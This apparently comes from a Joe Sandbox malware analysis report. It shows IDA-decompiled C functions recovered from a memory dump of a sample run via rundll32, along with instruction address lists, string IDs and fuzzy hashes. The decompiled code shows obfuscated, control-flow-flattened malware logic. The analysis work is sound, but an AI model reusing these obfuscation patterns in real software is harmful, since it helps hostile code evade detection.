                                                                                                                      									goto L15;
                                                                                                                      								} else {
                                                                                                                      									_t281 = E0034840B(_v76,  &_v20, _v80, _t275, _v112, _t319, _v116, _t261);
                                                                                                                      									_t320 =  &(_t320[6]);
                                                                                                                      									_v24 = _t281;
                                                                                                                      									if(_t281 == 0) {
                                                                                                                      										_t317 = _v24;
                                                                                                                      										L20:
                                                                                                                      										E003468DE(_v88, _v48, _v92, _v52, _t274);
                                                                                                                      									} else {
                                                                                                                      										_t282 = _v20;
                                                                                                                      										if(_t282 == 0) {
                                                                                                                      											goto L16;
                                                                                                                      										} else {
                                                                                                                      											_v44 = _v44 + _t282;
                                                                                                                      											_t319 = _t319 - _t282;
                                                                                                                      											if(_t319 != 0) {
                                                                                                                      												L9:
                                                                                                                      												_t261 = _v44;
                                                                                                                      												L10:
                                                                                                                      												_t275 = _v28;
                                                                                                                      												_t316 = 0xe0f16ec;
                                                                                                                      												continue;
                                                                                                                      											} else {
                                                                                                                      												_t283 = _t314 + _t314;
                                                                                                                      												_push(_t283);
                                                                                                                      												_push(_t283);
                                                                                                                      												_v16 = _t283;
                                                                                                                      												_t318 = E00353512(_t283);
                                                                                                                      												if(_t318 == 0) {
                                                                                                                      													goto L16;
                                                                                                                      												} else {
                                                                                                                      													E0035FD29(_t274, _v40, _t318, _v68, _t314);
                                                                                                                      													E003468DE(_v60, _v100, _v64, _v36, _t274);
                                                                                                                      													_t319 = _t314;
                                                                                                                      													_t273 = _t318 + _t314;
                                                                                                                      													_t314 = _v16;
                                                                                                                      													_t320 =  &(_t320[6]);
                                                                                                                      													_v44 = _t273;
                                                                                                                      													_t274 = _t318;
                                                                                                                      													if(_t319 == 0) {
                                                                                                                      														goto L16;
                                                                                                                      													} else {
                                                                                                                      														goto L9;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L18:
                                                                                                                      							return _t317;
                                                                                                                      						}
                                                                                                                      						_t314 = 0x10000;
                                                                                                                      						_push(_t275);
                                                                                                                      						_push(_t275);
                                                                                                                      						_t261 = E00353512(0x10000);
                                                                                                                      						_t274 = _t261;
                                                                                                                      						if(_t274 == 0) {
                                                                                                                      							_t275 = _v28;
                                                                                                                      							_t316 = 0x6559491;
                                                                                                                      							goto L15;
                                                                                                                      						} else {
                                                                                                                      							_v44 = _t261;
                                                                                                                      							_t319 = 0x10000;
                                                                                                                      							goto L10;
                                                                                                                      						}
                                                                                                                      						goto L18;
                                                                                                                      						L15:
                                                                                                                      						_t261 = _v44;
                                                                                                                      					} while (_t316 != 0x6559491);
                                                                                                                      					L16:
                                                                                                                      					_t317 = _v24;
                                                                                                                      					if(_t317 == 0) {
                                                                                                                      						goto L20;
                                                                                                                      					} else {
                                                                                                                      						_t266 = _v12;
                                                                                                                      						 *_t266 = _t274;
                                                                                                                      						 *((intOrPtr*)(_t266 + 4)) = _t314 - _t319;
                                                                                                                      					}
                                                                                                                      					goto L18;
                                                                                                                      				}
                                                                                                                      			}





















































                                                                                                                      0x003609b9
                                                                                                                      0x003609ba
                                                                                                                      0x003609be
                                                                                                                      0x003609cb
                                                                                                                      0x003609cf
                                                                                                                      0x003609d7
                                                                                                                      0x003609df
                                                                                                                      0x003609e7
                                                                                                                      0x003609ec
                                                                                                                      0x003609f4
                                                                                                                      0x003609fc
                                                                                                                      0x00360a01
                                                                                                                      0x00360a09
                                                                                                                      0x00360a0e
                                                                                                                      0x00360a16
                                                                                                                      0x00360a23
                                                                                                                      0x00360a27
                                                                                                                      0x00360a31
                                                                                                                      0x00360a41
                                                                                                                      0x00360a4c
                                                                                                                      0x00360a4f
                                                                                                                      0x00360a53
                                                                                                                      0x00360a57
                                                                                                                      0x00360a5f
                                                                                                                      0x00360a6f
                                                                                                                      0x00360a73
                                                                                                                      0x00360a78
                                                                                                                      0x00360a80
                                                                                                                      0x00360a88
                                                                                                                      0x00360a94
                                                                                                                      0x00360a99
                                                                                                                      0x00360a9f
                                                                                                                      0x00360aa4
                                                                                                                      0x00360aac
                                                                                                                      0x00360ab4
                                                                                                                      0x00360abc
                                                                                                                      0x00360ac1
                                                                                                                      0x00360ac9
                                                                                                                      0x00360ad6
                                                                                                                      0x00360ad9
                                                                                                                      0x00360add
                                                                                                                      0x00360ae5
                                                                                                                      0x00360af5
                                                                                                                      0x00360af9
                                                                                                                      0x00360b01
                                                                                                                      0x00360b09
                                                                                                                      0x00360b11
                                                                                                                      0x00360b19
                                                                                                                      0x00360b21
                                                                                                                      0x00360b29
                                                                                                                      0x00360b31
                                                                                                                      0x00360b39
                                                                                                                      0x00360b41
                                                                                                                      0x00360b4d
                                                                                                                      0x00360b50
                                                                                                                      0x00360b54
                                                                                                                      0x00360b60
                                                                                                                      0x00360b68
                                                                                                                      0x00360b70
                                                                                                                      0x00360b78
                                                                                                                      0x00360b80
                                                                                                                      0x00360b87
                                                                                                                      0x00000000
                                                                                                                      0x00360b8b
                                                                                                                      0x00360b8b
                                                                                                                      0x00360b8b
                                                                                                                      0x00360b9d
                                                                                                                      0x00360c68
                                                                                                                      0x00000000
                                                                                                                      0x00360ba3
                                                                                                                      0x00360ba9
                                                                                                                      0x00000000
                                                                                                                      0x00360baf
                                                                                                                      0x00360bcb
                                                                                                                      0x00360bcd
                                                                                                                      0x00360bd0
                                                                                                                      0x00360bd6
                                                                                                                      0x00360cd2
                                                                                                                      0x00360cd6
                                                                                                                      0x00360ce7
                                                                                                                      0x00360bdc
                                                                                                                      0x00360bdc
                                                                                                                      0x00360be2
                                                                                                                      0x00000000
                                                                                                                      0x00360be8
                                                                                                                      0x00360be8
                                                                                                                      0x00360bec
                                                                                                                      0x00360bee
                                                                                                                      0x00360c56
                                                                                                                      0x00360c56
                                                                                                                      0x00360c5a
                                                                                                                      0x00360c5a
                                                                                                                      0x00360c5e
                                                                                                                      0x00000000
                                                                                                                      0x00360bf0
                                                                                                                      0x00360bf4
                                                                                                                      0x00360bff
                                                                                                                      0x00360c00
                                                                                                                      0x00360c01
                                                                                                                      0x00360c0a
                                                                                                                      0x00360c10
                                                                                                                      0x00000000
                                                                                                                      0x00360c16
                                                                                                                      0x00360c22
                                                                                                                      0x00360c38
                                                                                                                      0x00360c3d
                                                                                                                      0x00360c3f
                                                                                                                      0x00360c42
                                                                                                                      0x00360c49
                                                                                                                      0x00360c4c
                                                                                                                      0x00360c50
                                                                                                                      0x00360c54
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00360c54
                                                                                                                      0x00360c10
                                                                                                                      0x00360bee
                                                                                                                      0x00360be2
                                                                                                                      0x00360bd6
                                                                                                                      0x00360ba9
                                                                                                                      0x00360cc9
                                                                                                                      0x00360cd1
                                                                                                                      0x00360cd1
                                                                                                                      0x00360c76
                                                                                                                      0x00360c83
                                                                                                                      0x00360c84
                                                                                                                      0x00360c87
                                                                                                                      0x00360c8c
                                                                                                                      0x00360c92
                                                                                                                      0x00360c9c
                                                                                                                      0x00360ca0
                                                                                                                      0x00000000
                                                                                                                      0x00360c94
                                                                                                                      0x00360c94
                                                                                                                      0x00360c98
                                                                                                                      0x00000000
                                                                                                                      0x00360c98
                                                                                                                      0x00000000
                                                                                                                      0x00360ca5
                                                                                                                      0x00360ca5
                                                                                                                      0x00360ca9
                                                                                                                      0x00360cb5
                                                                                                                      0x00360cb5
                                                                                                                      0x00360cbb
                                                                                                                      0x00000000
                                                                                                                      0x00360cbd
                                                                                                                      0x00360cbd
                                                                                                                      0x00360cc3
                                                                                                                      0x00360cc5
                                                                                                                      0x00360cc5
                                                                                                                      0x00000000
                                                                                                                      0x00360cbb

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -1$0_e$@K$Q!$$^J
                                                                                                                      • API String ID: 0-785566946
                                                                                                                      • Opcode ID: 41ea18c928f5bc6e050d69f8087d6909cd5aff65254f797b7e67a5a6cbd5e357
                                                                                                                      • Instruction ID: 5aa570b501ca4a85ecf714c4ee311e3ff986c6fe15b0cdb9d25364c093252c82
                                                                                                                      • Opcode Fuzzy Hash: 41ea18c928f5bc6e050d69f8087d6909cd5aff65254f797b7e67a5a6cbd5e357
                                                                                                                      • Instruction Fuzzy Hash: E9C1FFB15083819FC358DF69C48A80BFBE1FBC5794F508A1DF5A69A220D3B1D949CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E00350946(void* __ecx, void* __edx) {
                                                                                                                      				signed int _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _t226;
                                                                                                                      				signed int _t228;
                                                                                                                      				void* _t231;
                                                                                                                      				signed int _t233;
                                                                                                                      				signed int _t234;
                                                                                                                      				signed int _t235;
                                                                                                                      				signed int _t236;
                                                                                                                      				signed int _t237;
                                                                                                                      				void* _t263;
                                                                                                                      				void* _t264;
                                                                                                                      				signed int _t265;
                                                                                                                      				signed int* _t267;
                                                                                                                      				signed int* _t268;
                                                                                                                      
                                                                                                                      				_t267 =  &_v88;
                                                                                                                      				_v4 = _v4 & 0x00000000;
                                                                                                                      				_v8 = 0xb66c37;
                                                                                                                      				_v72 = 0xb73c2;
                                                                                                                      				_v72 = _v72 << 4;
                                                                                                                      				_v72 = _v72 | 0x07739320;
                                                                                                                      				_v72 = _v72 << 9;
                                                                                                                      				_v72 = _v72 ^ 0xef7952b0;
                                                                                                                      				_v28 = 0x2a4560;
                                                                                                                      				_v28 = _v28 + 0x8659;
                                                                                                                      				_v28 = _v28 ^ 0x002a9629;
                                                                                                                      				_v76 = 0x8c4def;
                                                                                                                      				_t263 = __edx;
                                                                                                                      				_t231 = __ecx;
                                                                                                                      				_t264 = 0xd46e588;
                                                                                                                      				_t233 = 0x74;
                                                                                                                      				_v76 = _v76 / _t233;
                                                                                                                      				_t234 = 0x6c;
                                                                                                                      				_v76 = _v76 * 3;
                                                                                                                      				_v76 = _v76 >> 5;
                                                                                                                      				_v76 = _v76 ^ 0x000c6890;
                                                                                                                      				_v80 = 0x921d05;
                                                                                                                      				_v80 = _v80 + 0xffff1131;
                                                                                                                      				_v80 = _v80 / _t234;
                                                                                                                      				_v80 = _v80 + 0xffff8087;
                                                                                                                      				_v80 = _v80 ^ 0x0007528b;
                                                                                                                      				_v20 = 0x474e9c;
                                                                                                                      				_t235 = 0xb;
                                                                                                                      				_v20 = _v20 * 0x25;
                                                                                                                      				_v20 = _v20 ^ 0x0a4b2981;
                                                                                                                      				_v44 = 0x41d7a6;
                                                                                                                      				_v44 = _v44 >> 4;
                                                                                                                      				_v44 = _v44 + 0xffffa7bd;
                                                                                                                      				_v44 = _v44 ^ 0x00093433;
                                                                                                                      				_v68 = 0x96e6ad;
                                                                                                                      				_v68 = _v68 * 0xe;
                                                                                                                      				_v68 = _v68 + 0x1201;
                                                                                                                      				_v68 = _v68 >> 9;
                                                                                                                      				_v68 = _v68 ^ 0x000fa369;
                                                                                                                      				_v24 = 0xe45c66;
                                                                                                                      				_t66 =  &_v24; // 0xe45c66
                                                                                                                      				_v24 =  *_t66 / _t235;
                                                                                                                      				_v24 = _v24 ^ 0x001eca74;
                                                                                                                      				_v12 = 0xe2325f;
                                                                                                                      				_v12 = _v12 >> 2;
                                                                                                                      				_v12 = _v12 ^ 0x003de0fa;
                                                                                                                      				_v40 = 0xdcdb46;
                                                                                                                      				_v40 = _v40 + 0xfb03;
                                                                                                                      				_v40 = _v40 + 0xffff4ab2;
                                                                                                                      				_v40 = _v40 ^ 0x00d010f5;
                                                                                                                      				_v16 = 0xf0578c;
                                                                                                                      				_t236 = 0x25;
                                                                                                                      				_v16 = _v16 * 0x2d;
                                                                                                                      				_v16 = _v16 ^ 0x2a381d62;
                                                                                                                      				_v60 = 0xf0efbe;
                                                                                                                      				_v60 = _v60 / _t236;
                                                                                                                      				_t265 = 0x18;
                                                                                                                      				_v60 = _v60 / _t265;
                                                                                                                      				_v60 = _v60 + 0xffffc994;
                                                                                                                      				_v60 = _v60 ^ 0x00051ba1;
                                                                                                                      				_v64 = 0xfb78a0;
                                                                                                                      				_v64 = _v64 << 9;
                                                                                                                      				_t237 = 0x41;
                                                                                                                      				_v64 = _v64 / _t237;
                                                                                                                      				_v64 = _v64 | 0xcaafab65;
                                                                                                                      				_v64 = _v64 ^ 0xcbeb608b;
                                                                                                                      				_v84 = 0xb70797;
                                                                                                                      				_v84 = _v84 ^ 0x7f243ece;
                                                                                                                      				_v84 = _v84 | 0x19416b2b;
                                                                                                                      				_v84 = _v84 ^ 0xcf7db733;
                                                                                                                      				_v84 = _v84 ^ 0xb0a40cc8;
                                                                                                                      				_v88 = 0xcdb2b9;
                                                                                                                      				_v88 = _v88 + 0x7ca0;
                                                                                                                      				_v88 = _v88 + 0xffff4266;
                                                                                                                      				_v88 = _v88 / _t265;
                                                                                                                      				_v88 = _v88 ^ 0x000ad15f;
                                                                                                                      				_v32 = 0x3f4742;
                                                                                                                      				_v32 = _v32 + 0xffff8438;
                                                                                                                      				_v32 = _v32 ^ 0x00328def;
                                                                                                                      				_v48 = 0xe7fa35;
                                                                                                                      				_v48 = _v48 | 0x5473134a;
                                                                                                                      				_v48 = _v48 + 0x6bf3;
                                                                                                                      				_v48 = _v48 ^ 0x54f160bb;
                                                                                                                      				_v36 = 0x82f06;
                                                                                                                      				_v36 = _v36 >> 1;
                                                                                                                      				_v36 = _v36 * 0x4f;
                                                                                                                      				_v36 = _v36 ^ 0x0140909c;
                                                                                                                      				_v52 = 0x77cd37;
                                                                                                                      				_v52 = _v52 << 0xb;
                                                                                                                      				_v52 = _v52 ^ 0x0f05aaad;
                                                                                                                      				_v52 = _v52 * 0x5b;
                                                                                                                      				_v52 = _v52 ^ 0x116d7cbe;
                                                                                                                      				_v56 = 0x6cb0a3;
                                                                                                                      				_v56 = _v56 + 0xab46;
                                                                                                                      				_v56 = _v56 >> 0x10;
                                                                                                                      				_v56 = _v56 + 0x7715;
                                                                                                                      				_v56 = _v56 ^ 0x0001d55a;
                                                                                                                      				do {
                                                                                                                      					while(_t264 != 0x8d90b87) {
                                                                                                                      						if(_t264 == 0x991fac7) {
                                                                                                                      							return E0034F88A(_v36, _v52, _v56,  *(_t263 + 0x30));
                                                                                                                      						}
                                                                                                                      						if(_t264 == 0xa3f1429) {
                                                                                                                      							_push(_t237);
                                                                                                                      							_t228 = E00358D71(_v72, _v28, __eflags, _v76, _v80, _t231);
                                                                                                                      							_t268 =  &(_t267[4]);
                                                                                                                      							 *(_t263 + 0x30) = _t228;
                                                                                                                      							__eflags = _t228;
                                                                                                                      							if(_t228 != 0) {
                                                                                                                      								E0034EE05(_v44, _v68, _v24, _t228, _t228);
                                                                                                                      								_t237 =  *(_t263 + 0x30);
                                                                                                                      								E0035E713(_t237, _v12, _v40, _v16);
                                                                                                                      								_t267 =  &(_t268[6]);
                                                                                                                      								_t264 = 0x8d90b87;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t264 == 0xd46e588) {
                                                                                                                      								_t264 = 0xa3f1429;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t264 != 0xf9322b8) {
                                                                                                                      									goto L14;
                                                                                                                      								} else {
                                                                                                                      									_t237 = E00346ED6;
                                                                                                                      									_t228 = E00354EFF(E00346ED6, _v84, E00346ED6, E00346ED6, _v88, _v32, E00346ED6, _v48, _t263);
                                                                                                                      									_t267 =  &(_t267[8]);
                                                                                                                      									 *(_t263 + 0x24) = _t228;
                                                                                                                      									if(_t228 == 0) {
                                                                                                                      										_t264 = 0x991fac7;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						return _t228;
                                                                                                                      						L18:
                                                                                                                      					}
                                                                                                                      					_t237 = _v60;
                                                                                                                      					_t226 = E00352BDE(_t237,  *(_t263 + 0x30), _v64);
                                                                                                                      					_t267 =  &(_t267[1]);
                                                                                                                      					 *(_t263 + 0xc) = _t226;
                                                                                                                      					__eflags = _t226;
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						_t264 = 0x991fac7;
                                                                                                                      						goto L14;
                                                                                                                      					} else {
                                                                                                                      						_t264 = 0xf9322b8;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L18;
                                                                                                                      					L14:
                                                                                                                      					__eflags = _t264 - 0x74fce14;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				return _t228;
                                                                                                                      			}






































                                                                                                                      0x00350c9b
                                                                                                                      0x00350c9e
                                                                                                                      0x00350ca1
                                                                                                                      0x00350ca3
                                                                                                                      0x00350cbb
                                                                                                                      0x00350ccc
                                                                                                                      0x00350ccf
                                                                                                                      0x00350cd4
                                                                                                                      0x00350cd7
                                                                                                                      0x00000000
                                                                                                                      0x00350cd7
                                                                                                                      0x00350c39
                                                                                                                      0x00350c3f
                                                                                                                      0x00350c7d
                                                                                                                      0x00000000
                                                                                                                      0x00350c41
                                                                                                                      0x00350c47
                                                                                                                      0x00000000
                                                                                                                      0x00350c4d
                                                                                                                      0x00350c61
                                                                                                                      0x00350c66
                                                                                                                      0x00350c6b
                                                                                                                      0x00350c6e
                                                                                                                      0x00350c73
                                                                                                                      0x00350c79
                                                                                                                      0x00000000
                                                                                                                      0x00350c79
                                                                                                                      0x00350c73
                                                                                                                      0x00350c47
                                                                                                                      0x00350c3f
                                                                                                                      0x00350d32
                                                                                                                      0x00000000
                                                                                                                      0x00350d32
                                                                                                                      0x00350ce8
                                                                                                                      0x00350cec
                                                                                                                      0x00350cf1
                                                                                                                      0x00350cf4
                                                                                                                      0x00350cf7
                                                                                                                      0x00350cf9
                                                                                                                      0x00350d05
                                                                                                                      0x00000000
                                                                                                                      0x00350cfb
                                                                                                                      0x00350cfb
                                                                                                                      0x00000000
                                                                                                                      0x00350cfb
                                                                                                                      0x00000000
                                                                                                                      0x00350d07
                                                                                                                      0x00350d07
                                                                                                                      0x00350d07
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 34$BG?$_2$`E*$f\
                                                                                                                      • API String ID: 0-782548322
                                                                                                                      • Opcode ID: 1fbc8c619ac66335679445dd97a2c125a12f0b84f7230f14f8954511ea27947f
                                                                                                                      • Instruction ID: 716ca1448897424735d78434d49faa90cdec4b055149729196bbece6d874356b
                                                                                                                      • Opcode Fuzzy Hash: 1fbc8c619ac66335679445dd97a2c125a12f0b84f7230f14f8954511ea27947f
                                                                                                                      • Instruction Fuzzy Hash: E7A131B29087819FC359CF24C58980BFBF1BBC4758F409A1DF9999A260D7B6D948CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E0035561F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                      				signed int _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				char _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				unsigned int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				void* _t181;
                                                                                                                      				signed int _t191;
                                                                                                                      				void* _t203;
                                                                                                                      				signed int _t204;
                                                                                                                      				signed int _t205;
                                                                                                                      				void* _t208;
                                                                                                                      				signed int _t218;
                                                                                                                      				intOrPtr* _t219;
                                                                                                                      				void* _t220;
                                                                                                                      				signed int* _t223;
                                                                                                                      
                                                                                                                      				_t219 = _a8;
                                                                                                                      				_push(_t219);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_t181);
                                                                                                                      				_v4 = _v4 & 0x00000000;
                                                                                                                      				_t223 =  &(( &_v92)[4]);
                                                                                                                      				_v12 = 0x6615d4;
                                                                                                                      				_v8 = 0x63ffda;
                                                                                                                      				_t220 = 0;
                                                                                                                      				_v28 = 0xf9afd3;
                                                                                                                      				_t208 = 0x31efc18;
                                                                                                                      				_v28 = _v28 >> 7;
                                                                                                                      				_v28 = _v28 ^ 0x0001f35e;
                                                                                                                      				_v80 = 0xd84a57;
                                                                                                                      				_v80 = _v80 << 3;
                                                                                                                      				_t204 = 0x18;
                                                                                                                      				_v80 = _v80 * 0x2a;
                                                                                                                      				_v80 = _v80 + 0x45cf;
                                                                                                                      				_v80 = _v80 ^ 0x1be1d7fe;
                                                                                                                      				_v84 = 0xce5c8a;
                                                                                                                      				_v84 = _v84 + 0xa551;
                                                                                                                      				_v84 = _v84 * 0x57;
                                                                                                                      				_v84 = _v84 | 0xfd3f873a;
                                                                                                                      				_v84 = _v84 ^ 0xff78090e;
                                                                                                                      				_v52 = 0xb08f91;
                                                                                                                      				_v52 = _v52 >> 0xc;
                                                                                                                      				_v52 = _v52 + 0xb2fa;
                                                                                                                      				_v52 = _v52 ^ 0x000b6173;
                                                                                                                      				_v56 = 0x674ce5;
                                                                                                                      				_v56 = _v56 + 0x398f;
                                                                                                                      				_v56 = _v56 >> 0x10;
                                                                                                                      				_v56 = _v56 ^ 0x0001bfbd;
                                                                                                                      				_v88 = 0x67105a;
                                                                                                                      				_v88 = _v88 * 0x51;
                                                                                                                      				_v88 = _v88 ^ 0xbb721b0a;
                                                                                                                      				_v88 = _v88 ^ 0x493680b5;
                                                                                                                      				_v88 = _v88 ^ 0xd2dd6d54;
                                                                                                                      				_v60 = 0x6eef31;
                                                                                                                      				_v60 = _v60 << 6;
                                                                                                                      				_v60 = _v60 | 0x99e12062;
                                                                                                                      				_v60 = _v60 ^ 0x9bf73816;
                                                                                                                      				_v92 = 0x911a2f;
                                                                                                                      				_v92 = _v92 ^ 0xd10c2d91;
                                                                                                                      				_v92 = _v92 * 0x5e;
                                                                                                                      				_v92 = _v92 << 7;
                                                                                                                      				_v92 = _v92 ^ 0xdd366504;
                                                                                                                      				_v64 = 0x3fcb13;
                                                                                                                      				_v64 = _v64 >> 0xf;
                                                                                                                      				_v64 = _v64 * 6;
                                                                                                                      				_v64 = _v64 ^ 0x00005971;
                                                                                                                      				_v44 = 0xc7907a;
                                                                                                                      				_v44 = _v44 << 0xb;
                                                                                                                      				_v44 = _v44 >> 0xb;
                                                                                                                      				_v44 = _v44 ^ 0x000cecb3;
                                                                                                                      				_v24 = 0x5cb13a;
                                                                                                                      				_v24 = _v24 | 0x9101a275;
                                                                                                                      				_v24 = _v24 ^ 0x91595ccd;
                                                                                                                      				_v48 = 0x23abf4;
                                                                                                                      				_v48 = _v48 / _t204;
                                                                                                                      				_v48 = _v48 << 2;
                                                                                                                      				_v48 = _v48 ^ 0x0009bb3e;
                                                                                                                      				_v68 = 0x8d9eb5;
                                                                                                                      				_v68 = _v68 >> 0x10;
                                                                                                                      				_v68 = _v68 + 0xf044;
                                                                                                                      				_v68 = _v68 >> 0xe;
                                                                                                                      				_v68 = _v68 ^ 0x000dd2f9;
                                                                                                                      				_v20 = 0x3507ed;
                                                                                                                      				_v20 = _v20 + 0xe3ac;
                                                                                                                      				_v20 = _v20 ^ 0x00302855;
                                                                                                                      				_v32 = 0xacaccb;
                                                                                                                      				_v32 = _v32 ^ 0xc0e60235;
                                                                                                                      				_t205 = 0x4e;
                                                                                                                      				_v32 = _v32 * 0x53;
                                                                                                                      				_v32 = _v32 ^ 0x583b0f23;
                                                                                                                      				_v36 = 0x7d6507;
                                                                                                                      				_v36 = _v36 + 0xffff02b5;
                                                                                                                      				_t191 = _v36;
                                                                                                                      				_t218 = _t191 % _t205;
                                                                                                                      				_v36 = _t191 / _t205;
                                                                                                                      				_v36 = _v36 ^ 0x0005008b;
                                                                                                                      				_v40 = 0xd19b6c;
                                                                                                                      				_v40 = _v40 | 0xa0bb2537;
                                                                                                                      				_v40 = _v40 + 0xffff1d7c;
                                                                                                                      				_v40 = _v40 ^ 0xa0fa32c2;
                                                                                                                      				_v72 = 0xc60854;
                                                                                                                      				_v72 = _v72 | 0x85b2e473;
                                                                                                                      				_v72 = _v72 + 0x7f84;
                                                                                                                      				_v72 = _v72 * 0x36;
                                                                                                                      				_v72 = _v72 ^ 0x423e0813;
                                                                                                                      				_v76 = 0xd43520;
                                                                                                                      				_v76 = _v76 + 0x4339;
                                                                                                                      				_v76 = _v76 + 0xffffe1a4;
                                                                                                                      				_v76 = _v76 >> 0xd;
                                                                                                                      				_v76 = _v76 ^ 0x000c8c56;
                                                                                                                      				do {
                                                                                                                      					while(_t208 != 0x2557e54) {
                                                                                                                      						if(_t208 == 0x31efc18) {
                                                                                                                      							_t208 = 0xe841cef;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t208 == 0xa700901) {
                                                                                                                      								E0034B267(_a4, _t218, _v68,  &_v16, _v20, _t208, _v32, _t220, _v36, _v40, _t208, _v72, _v76, _v80);
                                                                                                                      								 *_t219 = _v16;
                                                                                                                      							} else {
                                                                                                                      								if(_t208 != 0xe841cef) {
                                                                                                                      									goto L11;
                                                                                                                      								} else {
                                                                                                                      									_t203 = E0034B267(_a4, _t218, _v84,  &_v16, _v52, _t208, _v56, 0, _v88, _v60, _t208, _v92, _v64, _v28);
                                                                                                                      									_t223 =  &(_t223[0xc]);
                                                                                                                      									if(_t203 != 0) {
                                                                                                                      										_t208 = 0x2557e54;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L14:
                                                                                                                      						return _t220;
                                                                                                                      					}
                                                                                                                      					_push(_t208);
                                                                                                                      					_push(_t208);
                                                                                                                      					_t220 = E00353512(_v16);
                                                                                                                      					if(_t220 == 0) {
                                                                                                                      						_t208 = 0x2fabbe9;
                                                                                                                      						goto L11;
                                                                                                                      					} else {
                                                                                                                      						_t208 = 0xa700901;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L14;
                                                                                                                      					L11:
                                                                                                                      				} while (_t208 != 0x2fabbe9);
                                                                                                                      				goto L14;
                                                                                                                      			}


                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 1n$9C$U(0$qY$Lg
                                                                                                                      • API String ID: 0-890920262
                                                                                                                      • Opcode ID: 3dd90d24197c6e0eb425be8a52b4512aac5aa0624a9b5daf25ccf20776c8ba82
                                                                                                                      • Instruction ID: 76e2f2479d0f0dce9e20cce2a6fcc48d82c7526eea435f9e1aa19fd30811212c
                                                                                                                      • Opcode Fuzzy Hash: 3dd90d24197c6e0eb425be8a52b4512aac5aa0624a9b5daf25ccf20776c8ba82
                                                                                                                      • Instruction Fuzzy Hash: 8E910DB14093819FC359CF65C58A81BFBF1BB94758F004A0DF6A596260D3B69A48CF83
                                                                                                                      Uniqueness

